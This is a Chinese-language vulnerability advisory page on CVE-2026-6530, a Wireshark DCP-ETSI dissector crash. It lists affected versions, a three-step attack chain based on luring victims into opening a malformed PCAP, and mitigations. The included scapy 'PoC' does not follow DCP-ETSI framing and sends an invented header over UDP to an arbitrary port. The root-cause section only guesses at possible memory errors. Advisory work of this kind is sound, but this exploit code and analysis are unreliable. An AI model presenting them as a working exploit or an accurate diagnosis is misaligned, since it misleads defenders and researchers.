IPBUF安全漏洞报告
English
CVE-2026-6530 CVSS 5.5 中危

CVE-2026-6530 Wireshark DCP-ETSI协议解析器拒绝服务漏洞

披露日期: 2026-04-30

漏洞信息

漏洞编号
CVE-2026-6530
漏洞类型
拒绝服务
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Wireshark

相关标签

拒绝服务WiresharkDoSDCP-ETSI本地攻击

漏洞概述

该漏洞存在于Wireshark网络协议分析工具的DCP-ETSI协议解析器组件中。在受影响的版本范围内(4.6.0至4.6.4及4.4.0至4.4.14),攻击者可以通过诱导用户打开包含恶意构造数据包的捕获文件,触发解析器内部的崩溃。此漏洞利用了本地攻击向量,虽然需要用户交互,但成功利用将导致Wireshark应用程序异常终止,从而造成拒绝服务,影响网络分析工作的可用性。

技术细节

该漏洞的根本原因在于Wireshark的DCP-ETSI协议解析器在处理特定协议字段时存在边界检查缺失或异常处理不当。当解析器遇到经过精心构造的畸形数据包负载时,可能会触发非法内存访问、空指针解引用或堆栈溢出,导致应用程序进程崩溃。攻击者利用此漏洞的流程如下:首先,利用网络抓包工具或脚本生成包含恶意DCP-ETSI协议数据流的PCAP文件;其次,通过邮件附件、文件共享等方式诱导受害者使用存在漏洞的Wireshark版本打开该文件;最后,当Wireshark尝试解码并显示该数据包时,解析器逻辑发生错误,强制终止程序运行。虽然该漏洞位于本地且需要用户交互,未导致权限提升或信息泄露,但会严重中断安全分析人员的网络监控工作。

攻击链分析

STEP 1
步骤1:制作恶意文件
攻击者利用脚本生成包含畸形DCP-ETSI协议数据包的PCAP捕获文件。
STEP 2
步骤2:社会工程学诱导
攻击者将恶意文件伪装成正常的网络抓包数据,通过邮件或共享链接发送给目标用户。
STEP 3
步骤3:触发漏洞
受害者使用存在漏洞的Wireshark版本打开该文件,解析器处理异常数据时崩溃,导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
from scapy.all import * # Define a malformed DCP-ETSI packet structure for testing purposes # This attempts to trigger the dissector crash by sending an invalid length field class Malformed_DCP_ETSI(Packet): name = "Malformed DCP-ETSI" fields_desc = [ ByteField("header", 0xFF), FieldLenField("length", None, length_of="data", fmt="H"), StrLenField("data", "A"*1000, length_from=lambda pkt:pkt.length) # Excessive length ] # Craft the packet packet = Ether()/IP()/UDP(dport=12345)/Malformed_DCP_ETSI(length=10) # Mismatch length and data # Save to pcap file wrpcap("cve_2026_6530_poc.pcap", packet) print("[+] PoC file generated: cve_2026_6530_poc.pcap") print("[+] Open this file in a vulnerable Wireshark version to trigger the crash.")

影响范围

Wireshark 4.6.0 至 4.6.4
Wireshark 4.4.0 至 4.4.14

防御指南

临时缓解措施
建议用户在升级前暂时禁用DCP-ETSI协议解析器(通过Edit -> Preferences -> Protocols -> DCP-ETSI),或者不要打开来源不明的pcap文件。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表